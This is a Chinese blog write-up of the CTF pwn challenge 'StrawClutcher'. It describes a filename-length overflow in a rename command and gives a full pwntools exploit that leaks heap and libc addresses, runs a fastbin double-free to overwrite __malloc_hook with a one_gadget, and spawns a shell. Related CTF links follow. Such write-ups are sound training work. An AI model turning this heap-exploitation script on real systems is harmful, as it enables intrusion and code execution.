[BUUCTF-pwn] [BSidesCF 2019]StrawClutcher

最新推荐文章于 2022-05-19 22:14:53 发布
最新推荐文章于 2022-05-19 22:14:53 发布
阅读量289 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122824891
版权

looooooooooooooooooooooooooong代码

题目说是ftp服务器,其实就是在堆里建链每个文件带固定长度数据。代码长得不可相像,比如put就得用7个分支判断(3个字母大小写和1个空格)然后再判断参数。

数据结构:

        管理块:0x50 文件名:0x28, 大小:8, 数据块指针:8,8字节,下一块指针:8

数据块:长度在puts时输入

命令格式:

  • put  filename filesize 随后发送数据(长度由filesize确定)
  • rename filename newname 要求字母和.3位扩展名
  • dele filename 
  • retr filename 就是show会显示文件内容write,0不会被截断

上边这个看明白了就成了。漏洞就1点:修改文件名是对文件名长度没有限制,可以溢出。但由于文件名只能输入字母,所以有点小麻烦。第888行rename中检查目的文件名长度越界时用的原文件名,导致目的文件名长度可溢出。

          v51 = strndup(v48, v9 - v48);
          if ( strlen(v50) > 0x1F )             // 目的文件名为v51 但检查时用原文件名v50,导致目的文件名可溢出
          {
            v4 = "300 Destination filename too long.";
            goto LABEL_2;
          }

基本思路:

  1. 由于用libc-2.23所以建个0x80的块释放就可以得到unsort,所以这里建块ABC,其中B的数据块为0x80,释放B块到unsort
  2. 修改A块的文件名,溢出到文件长度的位置用字母覆盖长度使总长度达到B块数据块fd位置
  3. 用retr 显示A的文件内容得到堆地址(数据指针和链表指针)和main_arena指针
  4. 由于文件名溢出只能是字母,这里造一个块让它的起始位置为XX00它的数据块就是XX50,然后再建个块这个块的指针就指向上一个块XX00,然后修改文件名溢出到链表指针覆盖最后一位为50这样原链表里的XX00就会被XX50代替。XX50是可控的
  5. 在后边建两个0x68的块,fastbinattack需要在malloc前错位找标志,这个标志是0x7f,所以需要0x68的块,假设这两块叫A、B,先释放A再释放B,提前在XX50 的fake里将数据指针指向A,再释放XX50时就会再释放A一次形成A-B-A的环
  6. 再建0x68四次分别写__malloc_hook-0x23,0,0,\0*(3+8)+(one)+(realloc+n)带realloc调栈的one(这题用one[1]不用调栈就OK了)

完整exp:

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 28840) 

libc_elf = ELF('../buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

'''
chunk.head 0x50  name:0x28(overflow) size:8 ptr->data:8 0:8 ptr->next:8
chunk.data size
'''

p.sendline(b'put aaa.txt 10') #chunk0 
p.send(b'A'*10)

p.sendline(b'put bbb.txt 128') #chunk1 
p.send(b'A'*128)

p.sendline(b'put ccc.txt 10') #chunk2 
p.send(b'A'*10)

p.sendline(b'rename aaa.txt '+ b'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB.EAx') #chunk0 size=0x78

p.sendline(b'dele bbb.txt')

p.sendline(b'retr BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB.EAx')
p.recvuntil(b'A'*10)

data = p.recv(0x78-10)
heap = u64(data[-0x28:-0x20])
print('heap:', hex(heap))

libc_base = u64(data[-8:]) - 0x58 -0x10 - libc_elf.sym['__malloc_hook']
libc_elf.address = libc_base
one_gadget = libc_base + one[1]
print('libc:', hex(libc_base))

p.sendline(b'put bbb.txt 128') #chunk1 将原来的fastbin和unsort耗掉
p.send(b'A'*128)

p.sendline(b'put null.txt 80') #chunk1 填充让下一块起点尾地址为00
p.send(b'A'*80)


p.sendline(b'put true.txt 72') #0x48 fake = xxx00
p.send(b'fake.txt'.ljust(0x28, b'\x00')+ flat(0x68, heap+0x350, 0, heap+0x140))  #fake.data = xxx50 data->A.txt.data
p.sendline(b'put ptr.txt 8')   #fake.next = xxx00
p.send(b'A'*8)                
p.sendline(b'put A.txt 104') #chunkA 0x71
p.send(b'A'*104)
p.sendline(b'put B.txt 104') #chunkB 0x71
p.send(b'A'*104)
p.sendline(b'rename ptr.txt '+ b'A.aa'.rjust(0x40, b'A')+ p8(0x50))  #ptr.txt->next=XXX500->XXX550 fake.data 将fake链入链表

p.sendline(b'dele fake.txt') #A-B-A
p.sendline(b'dele B.txt')
p.sendline(b'dele A.txt')
p.recv()

p.sendline(b'put A.txt 104')
p.send(p64(libc_elf.sym['__malloc_hook'] - 0x23).ljust(0x68, b'\x00'))
p.sendline(b'put B.txt 104')
p.send(p64(0).ljust(0x68, b'\x00'))
p.sendline(b'put C.txt 104')
p.send(p64(0).ljust(0x68, b'\x00'))
p.sendline(b'put D.txt 104')
p.send((b'\x00'*(3+8+8)+ p64(one_gadget) ).ljust(0x68, b'\x00'))
p.recv()

p.sendline(b'put E.txt 10')

#gdb.attach(p)
#pause()

p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BSidesSF 2019 部分writeup
Kr的博客
03-06 2424
forensics: table-tennis 给了一个流量包,使用wireshark打开,通过查找字符串和跟踪TCP数据流并没有发现什么,以我的水平,基本上到这里就结束了。 后面查看了其他人写的writeup,跟着复现了一下。 这个流量包中除了大量的加密的TLS和TCP数据流,还有一些ICMP数据包,发现里面有HTML数据。 这里要将这些HTML数据提取出来,照着大佬使用pyt...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[BSidesCF 2019]Kookie
qq_46266956的博客
04-20 430
[BSidesCF 2019]Kookie 根据题目,这题和cookie逃不了关系 先用admin登录一下, 提示无效的用户名和密码 再看payload /?action=login&username=admin&password=admin 传的是username和password,前面提示是cookie,那就用cookie传一下 这里说的意思应该是我们的用户名是admin&password=admin 这样的话吧后面的&password=admin去掉就好了
BUUCTF:[BSidesCF 2019]Mixer
末初的CSDN博客
04-06 691
知识盲区题 不多bb了,涉及加密的看不太懂,直接放参考链接,记录一下 https://github.com/beerpwn/ctf/tree/master/2019/BSidesSF_CTF/web/mixer https://blog.csdn.net/a3320315/article/details/104335989?depth_1-utm_source=distribute.pc_rele...
BUUCTF [BSidesCF 2019] Mixer
Senimo
01-08 488
BUUCTF [BSidesCF 2019] Mixer 考点: 启动环境: 页面提示需要提升权限,并且提到了cookie,输入框中还有不能输入的is_admin属性 修改前端,使其值等于1: <input type="text" class="name" disabled="1" value="1"> 随意输入First name与Last name查看回显: 提示了需要以admin身份登陆,并将is_admin设置为1,使用BurpSuite抓取数据包: 使用Repeater发送后,
BUUCTF:[BSidesCF 2019]Pick Tac Toe
末初的CSDN博客
08-05 753
题目地址:https://buuoj.cn/challenges#[BSidesCF%202019]Pick%20Tac%20Toe 九个格子每个对应了一个id号,可以通过抓包修改已经提交了的id号,实现三个连线
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
[BUUCTF][BSidesCF 2019]Pick Tac Toe
Y4tacker的博客
10-17 2678
在网页源代码当中发现 因此我们只需要按顺序post三个value来战胜ai,我分别是ul,c,bl
[BSidesCF 2019]Kookie and [BSidesCF 2020]Cards
shinygod的博客
04-08 3793
知识点:cookie伪造 [BSidesCF 2019]Kookie 提示我们要以以admin身份登录,还告诉我们在cookie中,那答案呼之欲出。 在cookie中加入username=admin [BSidesCF 2020]Cards 做题目之前先了解一下21点的规则: 二十一点玩法规则和概率在二十一点游戏中,拥有最高点数的玩家获胜,其点数必须等于或低于21点;超过21点的玩家称为爆牌。 2点至10点的牌以牌面的点数来相加,J、Q、K 每张为10点。 A可记为1点或为11点,若玩家会因A而爆牌则
[BUUCTF-pwn] [BSidesCF 2019]Genius
weixin_52640415的博客
02-10 288
这个题打死也作不出来,看了个英文的wp 外国弄的这东西,思路不常见。一个是Genius文件是下人俄罗斯方块游戏(出的块是固定序列)这个本身没有问题。另外一个是loader文件,这个文件把游戏文件读入内存中,并允许修改两次每次1字节(通过一种JS啥的编码取5个字节中的若干位组成偏移和修改的字节)然后运行程序。 思路: 一是修改memset它在plt表中位置是XX30修改1字节改为XX20这个是system的plt表,以gameover的时候会调用到这个,就相当于system(XXX)了 ...
【BUUCTF】[BSidesCF 2019]Futurella
aoao331198的博客
05-19 446
检查 拿到代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ $a = $this->a;
2019年CTF3月比赛记录(一):BSidesSF 2019 CTF_Web部分题目writeup与重解
極品━═☆宏的博客
03-07 3956
2019年CTF比赛记录(一) 为了更好地学习CTF方面的相关知识,本着以赛促学的目的,决定自己报名参加一些2019年的CTF比赛,在比赛中去学其他的知识,帮助自己更好的学习Web方面的知识。限于个人能力有限,而且在时间上的限制,比赛中仅对自己当时看到的题目和解出的题目进行了解答。 比赛:BSidesSF 2019 CTF 时间:2019年3月4日至2019年3月5日 ...
BUUCTF:[BSidesCF 2019]Kookie
末初的CSDN博客
03-30 2056
BUUCTF:[BSidesCF 2019]Kookie 提示我们使用admin账户登录,并且存在cookie/monster两个账户? 抓包添加Cookie: username=admin即可得到flag
05创建公务卡扣减明细表_CASH_USE_MINUSAMT_DETAIL_20240708-刘君.sql
最新发布
07-19
05创建公务卡扣减明细表_CASH_USE_MINUSAMT_DETAIL_20240708-刘君.sql
【BP回归预测】龙格库塔算法优化BP神经网络RUN-BP光伏数据预测(多输入单输出)【含Matlab源码 5171期】.zip
07-19
CSDN海神之光上传的全部代码均可运行,亲测可用,直接换数据就行,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化BP神经网络分类预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化BP 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化BP 4.4.3 灰狼算法GWO/狼群算法WPA优化BP 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化BP 4.4.5 萤火虫算法FA/差分算法DE优化BP 4.4.6 其他优化算法优化BP
在UCA上结合DOA估计算法和自适应波束形成matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值